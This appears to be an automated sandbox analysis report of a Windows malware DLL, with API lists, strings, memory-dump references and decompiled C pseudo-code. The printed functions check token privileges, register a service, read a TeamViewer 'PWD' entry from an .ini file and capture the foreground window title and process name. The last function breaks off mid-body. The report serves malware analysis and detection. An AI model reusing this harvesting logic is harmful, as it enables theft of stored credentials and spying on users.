0x6eca8fa1
0x6eca8fac
0x6eca8fb7
0x6eca8fc2
0x6eca8fc9
0x6eca8fd4
0x6eca8fdf
0x6eca8fea
0x6eca8ff1
0x6eca8ffc
0x6eca9007
0x6eca9012
0x6eca9019
0x6eca9024
0x6eca902f
0x6eca903a
0x6eca9041
0x6eca904c
0x6eca9057
0x6eca9062
0x6eca9069
0x6eca9074
0x6eca907f
0x6eca908a
0x6eca9091
0x6eca909c
0x6eca90a7
0x6eca90b2
0x6eca90b9
0x6eca90c4
0x6eca90cf
0x6eca90da
0x6eca90e1
0x6eca90ec
0x6eca90f7
0x6eca9102
0x6eca9109
0x6eca9114
0x6eca911f
0x6eca912a
0x6eca9131
0x6eca9136
0x6eca9141
0x6eca9146
0x6eca914f
0x6eca9152
0x6eca915b
0x6eca9160
0x6eca9169
0x6eca9176
0x6eca917b
0x6eca9184
0x6eca918b
0x6eca918c
0x6eca9191
0x6eca9196
0x6eca919e
0x6eca919f
0x6eca91a5
0x6eca91a6
0x6eca91ab
0x6eca91b1
0x6eca91b3
0x6eca91b3
0x6eca91bd
0x6eca91c2
0x6eca91d7
0x6eca91d9
0x6eca91dc
0x6eca91e3
0x6eca91e4
0x6eca91ea
0x6eca91f1
0x6eca91f7
0x6eca9206
0x6eca920e
0x6eca9216
0x6eca921e
0x6eca9222
0x6eca922a
0x6eca9232
0x6eca923a
0x6eca923e
0x6eca9246
0x6eca924e
0x6eca9256
0x6eca925a
0x6eca9262
0x6eca926a
0x6eca9272
0x6eca9276
0x6eca927b
0x6eca927b
0x6eca9284
0x6eca928a
0x6eca929d
0x6eca929f
0x6eca92a9
0x6eca92aa
0x6eca92b0
0x6eca92b7
0x6eca92b9
0x6eca92c8
0x6eca92d0
0x6eca92d8
0x6eca92e0
0x6eca92e4
0x6eca92ec
0x6eca92f4
0x6eca92fc
0x6eca9300
0x6eca9305
0x6eca9305
0x6eca930e
0x6eca9314
0x6eca9327
0x6eca9329
0x6eca9333
0x6eca9334
0x6eca933a
0x6eca9341
0x6eca9352
0x6eca935a
0x6eca9362
0x6eca936a
0x6eca936e
0x6eca9373
0x6eca9373
0x6eca9384
0x6eca9389
0x6eca9395
0x6eca93a6
0x6eca93a8
0x6eca93b4
0x6eca93c1
0x6eca93c2
0x6eca93c8
0x6eca93cf
0x6eca93e4
0x6eca93ec
0x6eca93f4
0x6eca93fc
0x6eca9400
0x6eca9405
0x6eca9405
0x6eca940e
0x6eca9413
0x6eca9428
0x6eca942a
0x6eca9434
0x6eca9435
0x6eca943b
0x6eca9442
0x6eca9457
0x6eca945f
0x6eca9467
0x6eca946f
0x6eca9473
0x6eca9478
0x6eca9478
0x6eca947d
0x6eca9485
0x6eca9487
0x6eca9489
0x6eca9494
0x6eca94a1
0x6eca94a2
0x6eca94b2
0x6eca94b5
0x6eca94b5
0x6eca94be
0x6eca94d4
0x00000000
0x00000000
0x00000000
0x6eca896a
0x6eca884c
0x6eca883b
0x6eca8529

APIs

DisableThreadLibraryCalls.KERNEL32(?), ref: 6ECA8537
GetModuleHandleA.KERNEL32(00000000), ref: 6ECA853E
GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA855A
HeapAlloc.KERNEL32(00000000), ref: 6ECA8563
GetSystemDirectoryA.KERNEL32 ref: 6ECA8570
ExitProcess.KERNEL32 ref: 6ECA857B
PathAddBackslashA.KERNELBASE(00CD1A50), ref: 6ECA858E
GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA8597
HeapAlloc.KERNEL32(00000000), ref: 6ECA859A
GetModuleFileNameA.KERNEL32(?,00000000,00000104), ref: 6ECA85AF
GetProcessHeap.KERNEL32(00000008,00000105), ref: 6ECA85C1
HeapAlloc.KERNEL32(00000000), ref: 6ECA85C4
RtlMoveMemory.NTDLL(00000000,00CD1B60,00000021), ref: 6ECA85DA
PathRemoveFileSpecA.SHLWAPI(00CD1B60), ref: 6ECA85FB
PathAddBackslashA.SHLWAPI(00CD1B60), ref: 6ECA8608
SetCurrentDirectoryA.KERNELBASE(00CD1B60), ref: 6ECA8610
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000000,00000000), ref: 6ECA8637
PathAddBackslashA.SHLWAPI(?), ref: 6ECA864D
wsprintfA.USER32 ref: 6ECA8684
GetFileAttributesA.KERNELBASE(?,?,%s%s,?,?), ref: 6ECA869B
ExitProcess.KERNEL32 ref: 6ECA86A3
GetProcessHeap.KERNEL32(00000000,00CD1A50), ref: 6ECA94EE
HeapFree.KERNEL32(00000000), ref: 6ECA94F1
GetProcessHeap.KERNEL32(00000000,00CD1B60), ref: 6ECA94FE
HeapFree.KERNEL32(00000000), ref: 6ECA9501
GetProcessHeap.KERNEL32(00000000,00CBFF88), ref: 6ECA950E
HeapFree.KERNEL32(00000000), ref: 6ECA9511
GetProcessHeap.KERNEL32(00000000,00CD1C70), ref: 6ECA951E
HeapFree.KERNEL32(00000000), ref: 6ECA9521
GetProcessHeap.KERNEL32(00000000,00CC27F0), ref: 6ECA952E
HeapFree.KERNEL32(00000000), ref: 6ECA9531
GetProcessHeap.KERNEL32(00000000,00CB2C98), ref: 6ECA953E
HeapFree.KERNEL32(00000000), ref: 6ECA9541
GetProcessHeap.KERNEL32(00000000,00CC2700), ref: 6ECA954E
HeapFree.KERNEL32(00000000), ref: 6ECA9551
GetProcessHeap.KERNEL32(00000000,00CD21B8), ref: 6ECA955E
HeapFree.KERNEL32(00000000), ref: 6ECA9561
GetProcessHeap.KERNEL32(00000000,00CD3FB0), ref: 6ECA956E
HeapFree.KERNEL32(00000000), ref: 6ECA9571
GetProcessHeap.KERNEL32(00000000,00CBE878), ref: 6ECA957E
HeapFree.KERNEL32(00000000), ref: 6ECA9581
GetProcessHeap.KERNEL32(00000000,00CC63C8), ref: 6ECA958E
HeapFree.KERNEL32(00000000), ref: 6ECA9591
GetProcessHeap.KERNEL32(00000000,00CB2DA8), ref: 6ECA959E
HeapFree.KERNEL32(00000000), ref: 6ECA95A1

Strings

%s%s%s, xrefs: 6ECA86C2, 6ECA8709, 6ECA874C, 6ECA893D
s, xrefs: 6ECA8768
h2, xrefs: 6ECA9352
.odt, xrefs: 6ECA86C8
pass, xrefs: 6ECA8752
t, xrefs: 6ECA8779
.ini, xrefs: 6ECA8932
gd, xrefs: 6ECA8C01
TeamViewer, xrefs: 6ECA8937
tx, xrefs: 6ECA8772
15.0., xrefs: 6ECA9489
word, xrefs: 6ECA875D
ar.j, xrefs: 6ECA8671
%s%s, xrefs: 6ECA8663, 6ECA8CA8, 6ECA8E51, 6ECA91D1, 6ECA9297, 6ECA9321, 6ECA93A0, 6ECA9422
pg, xrefs: 6ECA8679

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
String ID: %s%s$%s%s%s$.ini$.odt$15.0.$TeamViewer$ar.j$gd$h2$pass$pg$s$t$tx$word
API String ID: 566710939-331841303
Opcode ID: c54d4bdc3dbab448e98f50e332ac6f7aa1cc7c2d2871344cafd73ed1cba1bdc3
Instruction ID: fdfcc7558374c680c15a130d053f50afd94914b3232bcdda252f7e08366b8f47
Opcode Fuzzy Hash: c54d4bdc3dbab448e98f50e332ac6f7aa1cc7c2d2871344cafd73ed1cba1bdc3
Instruction Fuzzy Hash: 31A28EB1904742EFDB60DFA9CA86A9FBBB8AF85344F00491DF64997240F7349844CF66

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3B60, Relevance: 12.1, APIs: 8, Instructions: 67
memoryregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E6ECA3B60(intOrPtr* _a8) {
				struct _SERVICE_STATUS* _v4;
				int _v8;
				CHAR* _t9;
				int _t10;
				void* _t13;
				int _t14;
				signed int _t18;
				short* _t20;
				int _t21;
				void _t22;
				void* _t23;
				void* _t26;
				intOrPtr* _t27;
				void* _t30;

				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1b60
				_t10 = SetCurrentDirectoryA(_t9); // executed
				_t27 = _a8;
				 *0x6ecb043c = 0x20;
				 *0x6ecb0440 = 2;
				 *0x6ecb0444 = 0x85;
				 *0x6ecb0448 = 0;
				 *0x6ecb044c = 0;
				 *0x6ecb0450 = 0;
				 *0x6ecb0454 = 0;
				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6ECA3A70, 0, _t23, _t26); // executed
				 *0x6ecb0394 = _t10;
				if(_t10 == 0) {
					 *0x6ecb0440 = 1;
					SetServiceStatus(0, 0x6ecb043c);
					ExitProcess(0);
				}
				_t21 = _v8;
				 *0x6ecb0440 = 4;
				_t30 = _t21 - 1;
				if(_t30 <= 0) {
					L7:
					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
					if(_t13 != 0) {
						_t22 = M6ECB04E8; // 0x1
						 *_t13 = _t22;
						CloseHandle(CreateThread(0, 0, E6ECA3930, _t13, 0, 0));
					}
					L9:
					_v4 = 0x6ecb043c;
					_t14 =  *0x6ecb0394; // 0x0
					_v8 = _t14;
					return SetServiceStatus(??, ??);
				}
				_t18 = 1;
				if(_t30 <= 0) {
					goto L7;
				} else {
					while(1) {
						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
							goto L9;
						}
						_t18 = _t18 + 1;
						if(_t18 < _t21) {
							continue;
						}
						goto L7;
					}
					goto L9;
				}
			}

0x6eca3b60
0x6eca3b68
0x6eca3b6e
0x6eca3b75
0x6eca3b7f
0x6eca3b89
0x6eca3b93
0x6eca3b99
0x6eca3b9f
0x6eca3ba5
0x6eca3bb3
0x6eca3bb9
0x6eca3bc0
0x6eca3c47
0x6eca3c51
0x6eca3c58
0x6eca3c58
0x6eca3bc2
0x6eca3bc6
0x6eca3bd0
0x6eca3bd3
0x6eca3bf4
0x6eca3bff
0x6eca3c07
0x6eca3c09
0x6eca3c19
0x6eca3c22
0x6eca3c22
0x6eca3c28
0x6eca3c2a
0x6eca3c32
0x6eca3c37
0x6eca3c3b
0x6eca3c3b
0x6eca3bd5
0x6eca3bd8
0x00000000
0x6eca3be0
0x6eca3be0
0x6eca3be0
0x6eca3be7
0x00000000
0x00000000
0x6eca3bef
0x6eca3bf2
0x00000000
0x00000000
0x00000000
0x6eca3bf2
0x00000000
0x6eca3be0

APIs

SetCurrentDirectoryA.KERNELBASE(00CD1B60), ref: 6ECA3B68
RegisterServiceCtrlHandlerExW.ADVAPI32(?,6ECA3A70,00000000), ref: 6ECA3BB3
GetProcessHeap.KERNEL32(00000008,00000004,?,6ECA3A70,00000000), ref: 6ECA3BF8
HeapAlloc.KERNEL32(00000000,?,6ECA3A70,00000000), ref: 6ECA3BFF
CreateThread.KERNEL32 ref: 6ECA3C1B
CloseHandle.KERNEL32(00000000,?,6ECA3A70,00000000), ref: 6ECA3C22
SetServiceStatus.ADVAPI32(00000000,6ECB043C,?,6ECA3A70,00000000), ref: 6ECA3C51
ExitProcess.KERNEL32 ref: 6ECA3C58

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
String ID:
API String ID: 2085172483-0
Opcode ID: cb418acb856ebe091435c3f1f83efbe1d3f58c178e06e5489648d69df486b830
Instruction ID: 97256410094a4cb9aa91f41f7589cedd0755f44c6f24092b36188f961b741704
Opcode Fuzzy Hash: cb418acb856ebe091435c3f1f83efbe1d3f58c178e06e5489648d69df486b830
Instruction Fuzzy Hash: A0210C70500A01EBCB109F9DCB5EA5FBBB9FF96708F10891EEA198B244E7759845CF21

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA3280, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6ECA3280(void* _a4) {
				void _v0;
				void* _v16;
				void _v72;
				long _v76;
				long _v80;
				long _v84;
				void* _v88;
				char _v96;
				DWORD* _t32;
				int _t36;
				long _t52;

				_t52 = _a4;
				_v76 = 0;
				_v84 = _t52;
				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
					_a4 = 0;
					_v80 = 0;
					if( *0x6ecb027c <= 5) {
						L7:
						DuplicateToken(_v84, 1,  &_a4);
						if(_v0 != 0) {
							goto L8;
						}
					} else {
						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
						if(_t36 != 0 && _v76 == 3) {
							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
						}
						if(_v0 != 0) {
							L8:
							_t32 =  &_v84;
							_v84 = 0x44;
							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
							if(_t32 != 0) {
								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
							}
							FindCloseChangeNotification(_v16); // executed
						} else {
							goto L7;
						}
					}
					if(_t52 == 0) {
						CloseHandle(_v88);
					}
					return _v80;
				} else {
					return _v76;
				}
			}

0x6eca3284
0x6eca3288
0x6eca3290
0x6eca3296
0x6eca32bd
0x6eca32c5
0x6eca32cd
0x6eca3313
0x6eca331f
0x6eca332a
0x00000000
0x00000000
0x6eca32cf
0x6eca32e9
0x6eca32ed
0x6eca3309
0x6eca3309
0x6eca3311
0x6eca332c
0x6eca332c
0x6eca333a
0x6eca3342
0x6eca334a
0x6eca335b
0x6eca335b
0x6eca3366
0x00000000
0x00000000
0x00000000
0x6eca3311
0x6eca336a
0x6eca3371
0x6eca3371
0x6eca337c
0x6eca337d
0x6eca3385
0x6eca3385

APIs

OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6ECA32A1
GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6ECA32E9
GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6ECA3309
DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6ECA331F
CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6ECA3342
CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6ECA335B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 6ECA3366
CloseHandle.KERNEL32(?), ref: 6ECA3371

Strings

D, xrefs: 6ECA333A

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
String ID: D
API String ID: 1214873377-2746444292
Opcode ID: cec1f532202aeaf7cd342d31ef79be0f4724c45e7c17bcfc6230524c85040bc2
Instruction ID: e045536126cdc9d0a59fb64467133c925c829d8b1d4a158061d09b6841c53542
Opcode Fuzzy Hash: cec1f532202aeaf7cd342d31ef79be0f4724c45e7c17bcfc6230524c85040bc2
Instruction Fuzzy Hash: 3F31E9B1548306AFD700CB58C859BAFB7F9BBC5B14F00891DF6A547284EB74E50ACB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ECA6D50, Relevance: 125.0, APIs: 65, Strings: 6, Instructions: 765
memorytimewindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E6ECA6D50(intOrPtr _a8, char _a49, char _a50) {
				intOrPtr _v0;
				char _v3;
				short _v572;
				short _v580;
				short _v1092;
				char _v1364;
				char _v1372;
				char _v1864;
				short _v1872;
				short _v1884;
				char _v1896;
				char _v1900;
				struct HWND__* _v1908;
				char _v1912;
				void* _v1928;
				struct HWND__* _v1932;
				void* _v1936;
				struct tagMSG _v1964;
				char _v1972;
				struct _FILETIME _v1980;
				void* _v1984;
				struct HWND__* _v1988;
				struct HWND__* _v1992;
				struct HWND__* _v1996;
				struct HWND__* _v2000;
				void _v2004;
				void* _v2008;
				void* _v2020;
				void* _v2024;
				void* _v2028;
				char _v2032;
				void* _v2036;
				void* _v2040;
				signed short _v2044;
				signed int _v2048;
				void* _v2052;
				char _v2068;
				void* _v2072;
				char _v2074;
				char _v2076;
				signed int _v2084;
				char _v2088;
				long _v2092;
				char _v2094;
				char _v2096;
				intOrPtr _v2100;
				struct HWND__* _v2104;
				void* _v2120;
				int _v2124;
				signed int _t251;
				signed int _t252;
				char _t254;
				WCHAR* _t255;
				int _t263;
				void* _t269;
				void* _t270;
				WCHAR* _t271;
				WCHAR* _t273;
				char _t275;
				char _t281;
				char _t284;
				void* _t288;
				CHAR* _t293;
				int _t294;
				char _t295;
				signed int _t296;
				void* _t299;
				signed char _t302;
				signed int _t303;
				CHAR* _t314;
				signed int _t316;
				signed int _t317;
				void* _t322;
				intOrPtr _t324;
				void* _t329;
				void* _t334;
				char _t344;
				long _t346;
				struct HWND__* _t370;
				char _t373;
				intOrPtr _t377;
				char _t379;
				void* _t380;
				signed int _t383;
				void* _t386;
				CHAR* _t395;
				struct HWND__* _t406;
				struct HWND__* _t407;
				signed int _t417;
				signed int _t422;
				signed short _t423;
				signed int _t424;
				CHAR* _t442;
				CHAR* _t443;
				CHAR* _t445;
				void* _t467;
				void* _t468;
				void* _t469;
				int _t470;
				void* _t471;
				struct HWND__* _t472;
				void* _t473;
				void* _t474;
				void _t475;
				intOrPtr* _t476;
				void* _t477;
				CHAR* _t478;
				void* _t479;
				void* _t481;
				void* _t486;
				signed short _t487;
				void* _t488;
				void* _t489;
				void* _t490;
				CHAR* _t492;
				char* _t493;
				char* _t494;
				void* _t495;
				signed int _t496;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t503;
				void* _t504;
				void* _t505;
				void* _t513;
				void* _t514;
				void* _t523;
				void* _t535;

				_t498 = (_t496 & 0xfffffff8) - 0x800;
				_push(0x14);
				_push( &_v1980);
				L6ECAC2EE();
				_t370 = 0;
				_t481 = VirtualAlloc(0, 0x1000, 0x1000, 4);
				if(_t481 == 0) {
					L91:
					return 0;
				} else {
					_push(0x14);
					_push( &_v1864);
					L6ECAC2EE();
					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
					CharLowerW( &_v1872);
					_push(0x9c);
					_push(0x6ecb03a0);
					L6ECAC2EE();
					_push( &_v2036);
					_push( &_v2032);
					_push( &_v2040);
					 *0x6ecb03a0 = 0x9c;
					_v2040 = 0;
					_v2032 = 0;
					_v2036 = 0;
					L6ECAC330();
					 *0x6ecb03ac = _v2048 & 0x0000ffff;
					_t251 = M6ECB04A8; // 0x0
					 *0x6ecb03a4 = _v2052;
					 *0x6ecb03a8 = _v2044;
					 *0x6ecb043a = 4;
					if(_t251 != 0) {
						_push(0x435a88);
						_push(1);
						_t417 =  &_v2032;
						_push(_t417);
						_push(_t251);
						_v2032 = 0x5e6f0892;
						_v2028 = 0;
						_v2024 = 0;
						_v2020 = 0;
						E6ECA1DB0();
						_t251 = _v2020;
						_t498 = _t498 + 0x10;
						if(_t251 != 0) {
							_v2072 = 0;
							_t251 =  *_t251(0, 0x65,  &_v2072);
							if(_t251 == 0) {
								_t251 = _v2084;
								if(_t251 != 0) {
									_t251 =  *(_t251 + 0x10) & 0x00001000;
									 *0x6ecb043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
								}
							}
						}
					}
					_push(0x34);
					_push(_t481);
					L6ECAC2EE();
					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
					 *((short*)(_t481 + 6)) = 0x102;
					 *((char*)(_t481 + 8)) = 1;
					_t422 = M6ECB04E4; // 0x0
					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
					_t513 = M6ECB050C - _t370; // 0x0
					_v2092 = _t370;
					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
					 *(_t481 + 9) = _t252;
					_t377 =  *0x6ecb03a4; // 0x0
					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
					_t423 =  *0x6ecb03a8; // 0x0
					 *(_t481 + 0x20) = _t423;
					_t514 = M6ECB04EC - _t370; // 0x0
					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
					 *((short*)(_t481 + 0x12)) =  *0x6ecb043a & 0x000000ff;
					_t424 =  *0x6ecb03ac; // 0x0
					 *(_t481 + 0x24) = _t424;
					_t254 = M6ECB0544; // 0x1
					 *((char*)(_t481 + 0xc)) = _t254;
					_t379 = M6ECB0548; // 0x1
					 *((char*)(_t481 + 0xb)) = _t379;
					 *(_t481 + 0xf) = _t370;
					 *((char*)(_t481 + 0x11)) = 0x17;
					_t255 = M6ECB04F8; // 0xcd21b8
					_t467 = E6ECAA2F0(_t255, 1,  &_v2092);
					_t499 = _t498 + 0xc;
					if(_t467 != _t370) {
						_t47 = _t481 + 0x34; // 0x34
						RtlMoveMemory(_t47, _t467, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t467);
					}
					_t380 = M6ECB0504; // 0xcd3fb0
					_v2092 = _t370;
					_t468 = E6ECAA2F0(_t380, 1,  &_v2092);
					_t500 = _t499 + 0xc;
					if(_t468 != _t370) {
						_t53 =  &_a49; // 0x35
						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t468);
					}
					_t469 = _v2092 +  &_a50;
					_v2092 = _t370;
					_t486 = E6ECAA2F0( &_v1900, 1,  &_v2092);
					_t501 = _t500 + 0xc;
					if(_t486 != _t370) {
						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t486);
					}
					_t487 = _t469 + _v2092 + 1;
					_v2044 = _t487;
					_t470 = SetTimer(_t370, _t370, _t370, _t370);
					_v2068 = 0x28;
					_v2052 = 1;
					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
					if(_t263 == _t370) {
						L90:
						VirtualFree(_t481, _t370, 0x8000);
						goto L91;
					} else {
						L15:
						L15:
						if(_v2052 == _t370) {
							_t383 = _v1964.message;
						} else {
							_t383 = 0x113;
							_v2052 = _t370;
							_v1964.message = 0x113;
							_v1964.hwnd = _t370;
							_v1964.wParam = _t470;
						}
						if(_t263 == 0xffffffff || _t383 == 0x10) {
							goto L89;
						}
						if(_t383 == 0x113) {
							if(_v1964.hwnd != _t370) {
								L87:
								DispatchMessageA( &_v1964);
								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
								if(_t263 != _t370) {
									_t487 = _v2048;
									goto L15;
								}
								goto L90;
							}
							L24:
							if(_t523 != 0) {
								goto L87;
							}
							KillTimer(_t370, _t470);
							E6ECA6A90( &_v2028, _t370);
							_t269 = M6ECB04D8; // 0x0
							_t270 = E6ECA38A0(_t269, _t370, _t370, 1);
							_push(0x1000 - _t487);
							_t471 = _t481 + _t487;
							_push(_t471);
							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
							L6ECAC2EE();
							_t271 = M6ECB04F8; // 0xcd21b8
							_t386 = M6ECB0504; // 0xcd3fb0
							_v2104 = _t370;
							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
							_t273 = M6ECB04D0; // 0xcc4128
							_t503 = _t501 + 0x28;
							if(GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273) != 0) {
								_t495 = E6ECAA2F0( &_v1092, 1,  &_v2096);
								_t503 = _t503 + 0xc;
								if(_t495 != _t370) {
									RtlMoveMemory(_t471, _t495, _v2096);
									HeapFree(GetProcessHeap(), _t370, _t495);
								}
							}
							_t275 = _v2096;
							_v2092 = _t275 + _v2048 + 1;
							 *(_t481 + 0x30) = _t275;
							_t472 = GetForegroundWindow();
							_v1884 = 0;
							if(_t472 != _t370) {
								GetWindowTextW(_t472,  &_v1884, 0x104);
							}
							_v2096 = _t370;
							_t488 = E6ECAA2F0( &_v1884, 1,  &_v2096);
							_t504 = _t503 + 0xc;
							if(_t488 != _t370) {
								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
								HeapFree(GetProcessHeap(), _t370, _t488);
							}
							_t489 = _v2092 + _v2096 + 1;
							_v1884 = 0;
							_v2096 = _t370;
							if(_t472 != _t370) {
								_v2088 = _t370;
								GetWindowThreadProcessId(_t472,  &_v2088);
								_t344 = _v2088;
								if(_t344 > _t370) {
									_v1936 = _t344;
									asm("pxor xmm0, xmm0");
									_v2092 = _t370;
									_v1932 = _t370;
									_v1928 = 0x18;
									asm("movq [esp+0xd0], xmm0");
									asm("movq [esp+0xd8], xmm0");
									_v1908 = _t370;
									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
									if(_t346 >= 0) {
										_push(0x104);
										_push( &_v1896);
										_push(_t370);
										_push(_v2104);
										L6ECAC38A();
										if(_t346 != 0) {
											_t479 = E6ECAA2F0( &_v1912, 1,  &_v2124);
											_t504 = _t504 + 0xc;
											if(_t479 != _t370) {
												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
												HeapFree(GetProcessHeap(), _t370, _t479);
											}
										}
										NtClose(_v2120);
									}
								}
							}
							_t281 = 0;
							_t473 = _v2096 +  &_v3;
							_v2092 = _t473;
							_v2096 = 0;
							_t535 =  *0x6ecb0398 - _t370; // 0x0
							if(_t535 == 0) {
								L54:
								_t474 = _t473 + _t281 + 1;
								_v2068 = 1;
								if(_t281 > 1) {
									_t406 =  *0x6ecb0398; // 0x0
									_t492 = _t474 + _t481;
									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474);
									_v2096 = _t281;
									if(_t281 > _t370 &&  *_t481 == 0x2d) {
										_t281 = 0;
										_v2096 = 0;
										 *_t492 = 0;
										 *((char*)(_t474 + _t481 + 1)) = 0;
									}
								}
								_v1992 = _t370;
								_v1988 = _t370;
								_v2000 = _t370;
								_v1996 = _t370;
								_t475 = _t474 + _t281 + 1;
								_v2072 = _t370;
								 *(_t481 + 0x2c) = _t370;
								 *(_t481 + 0x28) = _t370;
								if(_v1964.message != 0x83fe) {
									L61:
									 *((char*)(_t481 + 0xd)) = 0;
									 *(_t481 + 0x14) = _t370;
									goto L62;
								} else {
									_t334 = _v1964.lParam;
									if(_t334 == _t370) {
										goto L61;
									}
									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
									 *(_t481 + 0x14) =  *(_t334 + 4);
									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
									_v1988 =  *(_t334 + 0x18);
									_v2072 = _t334;
									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
									L62:
									_push( &_v2088);
									_push( &_v2092);
									_v2092 = _t370;
									_v2088 = _t370;
									_v1980.dwHighDateTime = E6ECA66E0();
									_t284 = _v2088;
									_push(1);
									_v1996 = _t284;
									_v2000 = _v2092;
									 *(_t481 + 0x28) = _t284;
									 *_t481 = _t475;
									E6ECA53F0(_v2024, _v2028, _t481, _t475);
									_t287 = _v1992;
									_t505 = _t504 + 0x1c;
									_v2008 = _t481;
									_v2004 = _t475;
									if(_v1992 != _t370) {
										_push(1);
										E6ECA53F0(_v2024, _v2028, _t287, _v1988);
										_t505 = _t505 + 0x14;
									}
									_push("k");
									_push( &_v2028);
									_t288 = E6ECA5690();
									_push(_t370);
									_t490 = _t288;
									E6ECA53F0(_v2024, _v2028, _t481, _t475);
									_t501 = _t505 + 0x1c;
									if(_v1980.dwHighDateTime != _t370) {
										VirtualFree(_v2092, _t370, 0x8000);
									}
